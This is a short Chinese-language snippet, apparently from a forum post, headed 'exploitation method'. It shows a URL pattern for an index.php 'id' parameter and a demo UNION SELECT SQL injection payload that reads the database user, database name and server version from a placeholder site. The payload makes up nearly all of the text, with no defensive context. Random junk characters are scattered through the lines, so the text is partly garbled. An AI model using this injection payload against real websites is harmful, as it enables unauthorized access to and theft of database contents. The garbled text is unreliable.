利用方法:, S& R2 c5 y* h# z- L- j3 M
http://www.xxx.com/index.php?id=[SQL]
# F" W# O$ t' ~' Q# H% v Demo:2 q/ ^4 M$ k/ F
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |